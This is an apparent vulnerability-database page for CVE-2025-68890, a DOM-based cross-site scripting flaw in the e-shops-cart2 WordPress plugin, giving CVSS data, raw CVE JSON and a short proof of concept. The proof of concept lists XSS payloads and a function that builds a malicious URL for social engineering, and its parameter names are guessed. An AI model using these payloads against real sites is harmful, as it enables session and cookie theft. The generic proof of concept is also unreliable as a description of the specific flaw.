Security Vulnerability Report
中文
CVE-2025-68890 CVSS 7.1 HIGH

CVE-2025-68890

Published: 2026-01-08 10:15:54
Last Modified: 2026-04-27 19:16:37

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in hands01 e-shops e-shops-cart2 allows DOM-Based XSS.This issue affects e-shops: from n/a through <= 1.0.4.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

e-shops-cart2 <= 1.0.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-68890 PoC - DOM-Based XSS in e-shops-cart2 WordPress Plugin // This PoC demonstrates how an attacker can inject malicious JavaScript // Basic XSS PoC - Triggers alert with cookie const xssPayload1 = '<script>alert(document.cookie)</script>'; // Image onerror event handler PoC const xssPayload2 = '<img src=x onerror=alert(document.domain)>'; // SVG-based PoC const xssPayload3 = '<svg onload=alert("XSS")>'; // Construct malicious URL function constructMaliciousURL(baseURL, payload) { const url = new URL(baseURL); // Common parameter names that might be vulnerable url.searchParams.set('id', payload); url.searchParams.set('product_id', payload); url.searchParams.set('category', payload); return url.toString(); } // Example usage const targetURL = 'https://victim-site.com/product-page/'; const maliciousURL = constructMaliciousURL(targetURL, xssPayload2); console.log('Malicious URL for social engineering:'); console.log(maliciousURL); // To test: Open this URL in a browser where e-shops-cart2 is installed // The JavaScript code in the payload will execute in the victim's browser context

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68890", "sourceIdentifier": "[email protected]", "published": "2026-01-08T10:15:54.217", "lastModified": "2026-04-27T19:16:37.300", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in hands01 e-shops e-shops-cart2 allows DOM-Based XSS.This issue affects e-shops: from n/a through <= 1.0.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/e-shops-cart2/vulnerability/wordpress-e-shops-plugin-1-0-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}